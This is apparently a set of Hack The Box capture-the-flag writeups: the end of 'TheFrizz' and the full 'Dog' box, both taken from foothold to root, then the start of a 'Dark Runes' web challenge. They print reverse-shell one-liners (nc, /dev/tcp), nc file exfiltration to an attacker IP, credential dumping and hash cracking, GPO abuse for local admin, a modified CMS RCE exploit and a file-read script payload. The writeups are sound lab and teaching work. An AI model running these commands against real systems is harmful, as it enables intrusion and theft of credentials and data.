And just like that, we gained a shell as frizz\w.webservice!

Now that we had access, the next logical step was to obtain database credentials. Fortunately, I found a config.php file.

Looking inside, we retrieved the database credentials:

$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

Since this was deployed on XAMPP, I knew there had to be a MySQL binary available for direct interaction. Its typical path is C:\xampp\mysql\bin\mysql.exe. Using it, I dumped the gibbonperson table:

SHELL> C:\xampp\mysql\bin\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "USE gibbon; SELECT * FROM gibbonperson;”
gibbonPersonID  title   surname firstName       preferredName   officialName    nameInCharacters        gender  username        passwordStrong  passwordStrongSalt      passwordForceReset        status  canLogin        gibbonRoleIDPrimary     gibbonRoleIDAll dob     email   emailAlternate  image_240       lastIPAddress   lastTimestamp   lastFailIPAddress lastFailTimestamp       failCount       address1        address1District        address1Country address2        address2District        address2Country phone1Type        phone1CountryCode       phone1  phone3Type      phone3CountryCode       phone3  phone2Type      phone2CountryCode       phone2  phone4Type      phone4CountryCode phone4  website languageFirst   languageSecond  languageThird   countryOfBirth  birthCertificateScan    ethnicity       religion        profession      employer jobTitle emergency1Name  emergency1Number1       emergency1Number2       emergency1Relationship  emergency2Name  emergency2Number1       emergency2Number2       emergency2Relationship    gibbonHouseID   studentID       dateStart       dateEnd gibbonSchoolYearIDClassOf       lastSchool      nextSchool      departureReason transport       transportNotes    calendarFeedPersonal    viewCalendarSchool      viewCalendarPersonal    viewCalendarSpaceBooking        gibbonApplicationFormID lockerNumber    vehicleRegistration       personalBackground      messengerLastRead       privacy dayType gibbonThemeIDPersonal   gibboni18nIDPersonal    studentAgreements       googleAPIRefreshToken     microsoftAPIRefreshToken        genericAPIRefreshToken  receiveNotificationEmails       mfaSecret       mfaToken        cookieConsent   fields
0000000001      Ms.     Frizzle Fiona   Fiona   Fiona Frizzle           Unspecified     f.frizzle       067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489   N       Full    Y       001     001     NULL    f.frizzle@frizz.htb     NULL    NULL    10.10.15.4      2025-03-16 17:10:23     10.10.15.50     2025-03-16 19:58:57       5                                                                                                                                                NULL             NULL    NULL    NULL                                                    Y       Y       N       NULL                            NULL    NULL    NULL    NULL      NULL    NULL                            Y       NULL    NULL    NULL

This revealed a single user entry:

f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489

Lets try to crack that! First of all we save the hash as 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489 under hash.txt then I ran hashcat!

hashcat -m 1420 hash.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 3600X 6-Core Processor, 1435/2934 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1420 (sha256($salt.$pass))
Hash.Target......: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff...Vz2489
Time.Started.....: Mon Mar 17 02:02:37 2025 (6 secs)
Time.Estimated...: Mon Mar 17 02:02:43 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1837.0 kH/s (0.20ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11020288/14344385 (76.83%)
Rejected.........: 0/11020288 (0.00%)
Restore.Point....: 11019264/14344385 (76.82%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Jensta -> Jemel123
Hardware.Mon.#1..: Util: 41%

Started: Mon Mar 17 02:02:25 2025
Stopped: Mon Mar 17 02:02:45 2025

Hashcat successfully cracked it:

f.frizzle : Jenni_Luvs_Magic23

In Kerberos authentication, any valid domain user can request a Ticket Granting Ticket (TGT) as part of the normal authentication process. Let's check if we can do that with this password. In the meantime, we'll use SharpHound to see if we can grab any additional data!

First, we open a Python HTTP server to download the binary:

Invoke-WebRequest -Uri "http://10.10.XX.XXX:8000/SharpHound.exe" -OutFile SharpHound.exe

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         3/16/2025   7:25 PM          27026 20250316192446_BloodHound.zip                                        
-a----         3/16/2025   7:25 PM           1638 MzY2OGI0YzgtYjEwMy00ZDZmLThhNzAtNmI4ZDI0NjQ1YmNj.bin                 
-a----         3/16/2025   7:24 PM        1276928 SharpHound.exe

Now, to download the file, we open port 4444 on our Kali machine using nc:

nc -l -p 4444 > 20250316192446_BloodHound.zip

Next, on the target machine, use nc to upload the file:

Get-Content "C:\ttm\20250316192446_BloodHound.zip" -Raw | C:\ttm\nc.exe 10.10.XX.XXX 4444

Now, let's focus on Ms. Fiona Frizzle. First, we need to sync our Kali machine's time with the server, as Kerberos is time-sensitive: sudo ntpdate -s 10.10.11.60

Next, set up the appropriate krb5.conf:

cat /etc/krb5.conf         
[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB

Let's try to request a TGT:

impacket-getTGT  frizz.htb/f.frizzle:Jenni_Luvs_Magic23 -dc-ip frizzdc.frizz.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in f.frizzle.ccache

It worked! Now, let's use the ticket with KRB5CCNAME and log in using evil-winrm:

┌──(kali㉿ctOS)-[~/htb/pwn/thefrizz]
└─$ export KRB5CCNAME=f.frizzle.ccache
                                                                                                                                                                                                 
┌──(kali㉿ctOS)-[~/htb/pwn/thefrizz]
└─$ evil-winrm -i frizzdc.frizz.htb -r frizz.htb -k f.frizzle.ccache

For some reason, evil-winrm kept refusing to connect, even though the ticket was valid. After some troubleshooting, I realized we also had SSH access! SSH uses KRB tickets to authenticate as well, so let's try that:

ssh f.frizzle@10.10.11.60

PowerShell 7.4.5
PS C:\Users\f.frizzle> cmd  
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

frizz\f.frizzle@FRIZZDC C:\Users\f.frizzle>

We successfully logged in, and now we can get the user flag:


frizz\f.frizzle@FRIZZDC C:\Users\f.frizzle>more Desktop\user.txt
25617f9c3ceb47ac4335556e64fb5b2e

Privilege Escalation

This part of the box made me quite frustrated! Pivoting from f.frizzle to any other user seemed almost impossible at first. However, a friend pointed out some hidden archives in the Recycle Bin, specifically in the m.schoolbus bin (since that's his domain ID).

Here’s the directory listing:

Directory of C:\$Recycle.Bin\S-1-5-21-2386970044-1145388522-2932701813-1103

10/29/2024  07:31 AM    <DIR>          .
10/29/2024  07:31 AM    <DIR>          ..
10/29/2024  07:31 AM               148 $IE2XMEG.7z
10/24/2024  09:16 PM        30,416,987 $RE2XMEG.7z
10/29/2024  07:31 AM               129 desktop.ini
               3 File(s)     30,417,264 bytes
               2 Dir(s)     694,263,808 bytes free

Download the files using nc that I had uploaded before:

┌──(kali㉿ctOS)-[~/htb/tools]
└─$ nc -l -p 4444 > IE2XMEG.7z                                          
^C

frizz\f.frizzle@FRIZZDC C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103>C:\ttm\nc.exe 10.10.XX.XXX 4444 < C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$IE2XMEG.7z
                                                                                                                                                                                                                 
┌──(kali㉿ctOS)-[~/htb/tools]
└─$ nc -l -p 4444 > RE2XMEG.7z
^C

frizz\f.frizzle@FRIZZDC C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103>C:\ttm\nc.exe 10.10.XX.XXX 4444 < C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z

Surprisingly, RE2XMEG contains a WAPT backup file: wapt-backup-sunday.7z.

By researching WAPT, we discovered it stores credentials in /conf/waptserver.in

Decoding the base64 gives us the password: !suBcig@MehTed!R.

Now, we can re-request a TGT for the m.schoolbus user:

┌──(kali㉿ctOS)-[~/htb/pwn/thefrizz/school]
└─$ sudo ntpdate -s 10.10.11.60
[sudo] password for kali: 
                                                                                                                                                                                                                 
┌──(kali㉿ctOS)-[~/htb/pwn/thefrizz/school]
└─$ impacket-getTGT  frizz.htb/m.schoolbus:'!suBcig@MehTed!R' -dc-ip frizzdc.frizz.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in m.schoolbus.ccache
                                                                                                                                                                                                                 
┌──(kali㉿ctOS)-[~/htb/pwn/thefrizz/school]
└─$ export KRB5CCNAME=m.schoolbus.ccache
                                                                                                                                                                                                                 
┌──(kali㉿ctOS)-[~/htb/pwn/thefrizz/school]
└─$ ssh m.schoolbus@10.10.11.60

Next, I went back to BloodHound and discoverd that M.SCHOOLBUS can WriteGPLink to the Class_Friz OU.

This allows us to create a new GPO, link it to the Class_Friz OU, and THEN use SharpGPOAbuse to add a local admin user (e.g., m.schoolbus or f.frizzle). After running gpupdate /force, we can check if the policies have been applied with: net localgroup administrators

PS C:\tmp> IWR -Uri http://10.10.XX.XXX:8000/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
PS C:\tmp> IWR -Uri http://10.10.XX.XXX:8000/RunasCs.exe -OutFile RunasCs.exe     
PS C:\tmp> dir

    Directory: C:\tmp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---           3/16/2025  9:03 PM          80896 SharpGPOAbuse.exe

PS C:\tmp> New-GPO -Name "MalcGPO" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
                                                                                                                        
GpoId       : 66132d68-f635-4d87-8a65-cedca0f0b9f7
DisplayName : MalcGPO
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 3

PS C:\tmp> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "MalcGPO"     
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "MalcGPO" is: {66132D68-F635-4D87-8A65-CEDCA0F0B9F7}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{66132D68-F635-4D87-8A65-CEDCA0F0B9F7}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\tmp> gpupdate /force                    
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

PS C:\tmp> .\RunasCs.exe M.SchoolBus '!suBcig@MehTed!R' cmd.exe -r 10.10.XX.XXX:1337        

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-3a981$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2620 created in background.
PS C:\tmp>

And just like that rooted!

nc -lvnp 1337                           
listening on [any] 1337 ...
connect to [10.10.XX.XXX] from (UNKNOWN) [10.10.11.60] 64122
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
653726fa23bc5c00cf8e859cba8b121a

C:\Windows\system32>

Dog - HTB

Sat, 08 Mar 2025 00:00:00 GMT

Dog (10.10.11.58)

Enumeration & Data Gathering

rustscan -a 10.10.11.58 -- -sC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.58:80
Open 10.10.11.58:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip 10.10.11.58
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-08 20:11 +00
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating SYN Stealth Scan at 20:11
Scanning dog.htb (10.10.11.58) [2 ports]
Discovered open port 80/tcp on 10.10.11.58
Discovered open port 22/tcp on 10.10.11.58
Completed SYN Stealth Scan at 20:11, 0.35s elapsed (2 total ports)
NSE: Script scanning 10.10.11.58.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:11
Completed NSE at 20:12, 11.32s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Nmap scan report for dog.htb (10.10.11.58)
Host is up, received user-set (0.33s latency).
Scanned at 2025-03-08 20:11:58 +00 for 12s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEJsqBRTZaxqvLcuvWuqOclXU1uxwUJv98W1TfLTgTYqIBzWAqQR7Y6fXBOUS6FQ9xctARWGM3w3AeDw+MW0j+iH83gc9J4mTFTBP8bXMgRqS2MtoeNgKWozPoy6wQjuRSUammW772o8rsU2lFPq3fJCoPgiC7dR4qmrWvgp5TV8GuExl7WugH6/cTGrjoqezALwRlKsDgmAl6TkAaWbCC1rQ244m58ymadXaAx5I5NuvCxbVtw32/eEuyqu+bnW8V2SdTTtLCNOe1Tq0XJz3mG9rw8oFH+Mqr142h81jKzyPO/YrbqZi2GvOGF+PNxMg+4kWLQ559we+7mLIT7ms0esal5O6GqIVPax0K21+GblcyRBCCNkawzQCObo5rdvtELh0CPRkBkbOPo4CfXwd/DxMnijXzhR/lCLlb2bqYUMDxkfeMnmk8HRF+hbVQefbRC/+vWf61o2l0IFEr1IJo3BDtJy5m2IcWCeFX3ufk5Fme8LTzAsk6G9hROXnBZg8=
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y=
|   256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open  http    syn-ack ttl 63
| http-robots.txt: 22 disallowed entries 
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply 
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password 
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 11.94 seconds
           Raw packets sent: 2 (88B) | Rcvd: 2 (88B)

Port 22 - SSH
Port 80 - HTTP
/.git Folder exposed

We use git-dumper to dump and recontruct file from the exposed .git folder found

git-dumper http://dog.htb/.git ./gitdump

Within that we managed to get the following data

root:BackDropJ2024DS2024
tiffany
Backdrop CMS V1.27.1

If we try that sql password with Tiffany on the login it would work as well and take us to the CMS Administrator Dash

Exploitation

Now that we have access to the website as an administrator there is plenty of stuffs we can do! What stands up is this RCE . How I found it? A simple search for the backdrop with the specified version we found.

Let’s start by building the shell using the POC script given in ExploitDB!

┌──(kali㉿kali)-[~/htb/pwn/dog]
└─$ python3 52021.py      
Usage: python script.py [url]
                                                                                                                            
┌──(kali㉿kali)-[~/htb/pwn/dog]
└─$ python3 52021.py http://dog.htb
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://dog.htb/modules/shell/shell.php

If we try to upload the generated shell.zip we’ll get an error:

Lets try to tweak the script to gen us a .tar.gz instead maybe that would help us bypass this, simple edit the create_zip func and add the appropriate import.

import tarfile

def create_zip(info_path, php_path):
    tar_filename = "shell.tar.gz"
    with tarfile.open(tar_filename, "w:gz") as tar:
        tar.add(info_path, arcname='shell/shell.info')
        tar.add(php_path, arcname='shell/shell.php')
    return tar_filename

And yes it did!

Now if we go to http://dog.htb/modules/shell/shell.php we’ll get our PHP shell from which we can spawn a revshell using

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $IP $PORT >/tmp/f

bash -c 'exec bash -i &>/dev/tcp/IP/PORT <&1'

Great now we have a rev shell to the machine! Lets check what user we got

www-data@dog:/var/www/html/modules/shell$ cat /etc/passwd
cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash

Ok there seem to be 3, also let’s note that Backdrop CMS is currently running under /var/www/html (this will be crucial later, me from the future 😛)

Also since we’re now in the machine we can access directly the SQL DB, let’s do and check if we got anything intersting there

www-data@dog:/var/www/html$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11969
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Alright, we’re in, lets see what we got here

mysql> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| backdrop           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use backdrop;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_backdrop          |
+-----------------------------+
| batch                       |
| cache                       |
| cache_admin_bar             |
| cache_bootstrap             |
| cache_entity_comment        |
| cache_entity_file           |
| cache_entity_node           |
| cache_entity_taxonomy_term  |
| cache_entity_user           |
| cache_field                 |
| cache_filter                |
| cache_layout_path           |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_token                 |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_metadata               |
| file_usage                  |
| flood                       |
| history                     |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| queue                       |
| redirect                    |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| state                       |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| tempstore                   |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| watchdog                    |
+-----------------------------+
59 rows in set (0.00 sec)

mysql> select * from users;
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
| uid | name              | pass                                                    | mail                       | signature | signature_format | created    | changed    | access     | login      | status | timezone | language | picture | init                       | data       |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
|   0 |                   |                                                         |                            |           | NULL             |          0 |          0 |          0 |          0 |      0 | NULL     |          |       0 |                            | NULL       |
|   1 | jPAdminB          | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | jPAdminB@dog.htb           |           | NULL             | 1720548614 | 1720584122 | 1720714603 | 1720584166 |      1 | UTC      |          |       0 | jPAdminB@dog.htb           | 0x623A303B |
|   2 | jobert            | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | jobert@dog.htb             |           | NULL             | 1720584462 | 1720584462 | 1720632982 | 1720632780 |      1 | UTC      |          |       0 | jobert@dog.htb             | NULL       |
|   3 | dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | dogBackDroopSystem@dog.htb |           | NULL             | 1720632880 | 1720632880 | 1723752097 | 1723751569 |      1 | UTC      |          |       0 | dogBackDroopSystem@dog.htb | NULL       |
|   5 | john              | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | john@dog.htb               |           | NULL             | 1720632910 | 1720632910 |          0 |          0 |      1 | UTC      |          |       0 | john@dog.htb               | NULL       |
|   6 | morris            | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | morris@dog.htb             |           | NULL             | 1720632931 | 1720632931 |          0 |          0 |      1 | UTC      |          |       0 | morris@dog.htb             | NULL       |
|   7 | axel              | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | axel@dog.htb               |           | NULL             | 1720632952 | 1720632952 |          0 |          0 |      1 | UTC      |          |       0 | axel@dog.htb               | NULL       |
|   8 | rosa              | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | rosa@dog.htb               |           | NULL             | 1720632982 | 1720632982 |          0 |          0 |      1 | UTC      |          |       0 | rosa@dog.htb               | NULL       |
|  10 | tiffany           | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | tiffany@dog.htb            |           | NULL             | 1723752136 | 1723752136 | 1741468704 | 1741468444 |      1 | UTC      |          |       0 | tiffany@dog.htb            | NULL       |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
9 rows in set (0.02 sec)

I tried cracking both hashes of Jobert and John but no success.

As a last resort and just out of luck I checked if tiffany’s password would work on any of the users and it did with johncusack 🤦🏻‍♂️

ssh johncusack@dog.htb  
johncusack@dog.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

johncusack@dog:~$ cat user.txt
375df087aaebc87d7e4ab8614ff2b53f

Privilege Escalation

Ok we got sudo on Bee

Bee is a command line utility for Backdrop CMS. It includes commands that allow developers to interact with Backdrop sites, performing actions like:

Running cron
Clearing caches
Downloading and installing Backdrop
Downloading, enabling and disabling projects
Viewing information about a site and/or available projects

Source

johncusack@dog:~$ sudo bee --help
🐝 Bee
Usage: bee [global-options] <command> [options] [arguments]

Global Options:
 --root
 Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory.

 --site
 Specify the directory name or URL of the Backdrop site to use (as defined in 'sites.php'). If not set, will try to find the Backdrop site automatically based on the current directory.

 --base-url
 Specify the base URL of the Backdrop site, such as https://example.com. May be useful with commands that output URLs to pages on the site.

 --yes, -y
 Answer 'yes' to questions without prompting.

 --debug, -d
 Enables 'debug' mode, in which 'debug' and 'log' type messages will be displayed (in addition to all other messages).

 ADVANCED
  db-query
   dbq
   Execute a query using db_query().

  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

  php-script
   scr
   Execute an arbitrary PHP file after bootstrapping Backdrop.

  sql
   sqlc, sql-cli, db-cli
   Open an SQL command-line interface using Backdrop's database credentials.

Eval argument is definitely interesting here it says it can execute PHP code? so can we use it to spawn shell? Lets try it out!

johncusack@dog:~$ sudo bee eval 'system("/bin/bash");'

 ✘  The required bootstrap level for 'eval' is not ready.

Hmm something is wrong here? Lets use status to check what’s going on

johncusack@dog:~$ sudo bee status

 ⚠ No Backdrop installation found. Run this command again from within a Backdrop installation, or use the '--root' global  
    option.

Ok I see, it couldnt detect the backdrop installation path but we already know this from the previous shell we dropped to get the initial access and we can specify it using —root

johncusack@dog:~$ sudo bee --root=/var/www/html eval 'system("/bin/bash");'
root@dog:/var/www/html# cat /root/root.txt
ddbe23c2046a10d74c829d56084918f2
root@dog:/var/www/html#

Dark Runes - Web Challenge

Fri, 07 Mar 2025 00:00:00 GMT

Dark Runes - Web

Survivors find a battered laptop in the rubble. Powering it up, they discover a cryptic software interface from an ancient architecture firm, hinting at vital blueprints. They must crack its security protocols. Undeterred, they race against time.

Cookies Forging

Ok so first of all we’re given the files to download.

Upon analyzing it we find that the user cookie cookie is poorly constructed and we can easily forge the administrator one

const generateCookie = (username, id) => {  
	const stringifiedUser = btoa(JSON.stringify({ username, id }));  
	const sig = signString(stringifiedUser);  
	return `${stringifiedUser}-${sig}`;
};

const signString = (s) =>  
crypto.createHash("sha256")    
.update(s + SECRET)    
.digest("hex");

if we take our user session and base64 decode it we’ll get

Great now the first part which is stringifiedUser is easy to generate we also know that the valid administrator username is admin but how we’ll figure out sig that uses a Secret? We’ll if you look closer you will find that /documents uses the very same to generate the signature of document content

So we can use that to generate the valid signature we need for our cookie, so we just create a document with Base64 of {"username":"admin","id":1} which is:

eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjF9

Then we get the signature 5ba9cf081c7d399eb7348d1573e95c36eb39786c8e08938bd566a6709ad1c44c , Please note that this signature may change on your end of the Challenge instances restarts so regenerate it on your end.

We can simply use that to construct the user cookie eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjF9-SIGNATURE

eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjF9-5ba9cf081c7d399eb7348d1573e95c36eb39786c8e08938bd566a6709ad1c44c

CVE-2023-0835

Great now what we have admin access we can start using the endpoints that generate PDF from the documents, if we take a closer look on the packages list we’ll find out that markdown-pdf is of version 11.0.0 which has a CVE-2023-0835 that would allow LFI.

We can utilize a payload like:

<script>
 // Path Disclosure
 document.write(window.location);
 // Arbitrary Local File Read
 xhr = new XMLHttpRequest;
 xhr.onload=function(){document.write((this.responseText))};
 xhr.open("GET","file:///etc/passwd");
 xhr.send();
</script>

Source

Looking at this, the first endpoint would be useless to us since it has a content sanitizer. That would break our payload and the second requires an access_pass? Lets take a closer look into that

Initially, the ACCESS_PASS would hold a 32-character random string.

The verification process would simply check if the pass supplied in the request exists as a file and if the current ACCESS_PASS stored in memory matches the pass provided. If they don’t match, a new code would be generated using the generateAccessCode(); function, and the old file would be deleted.

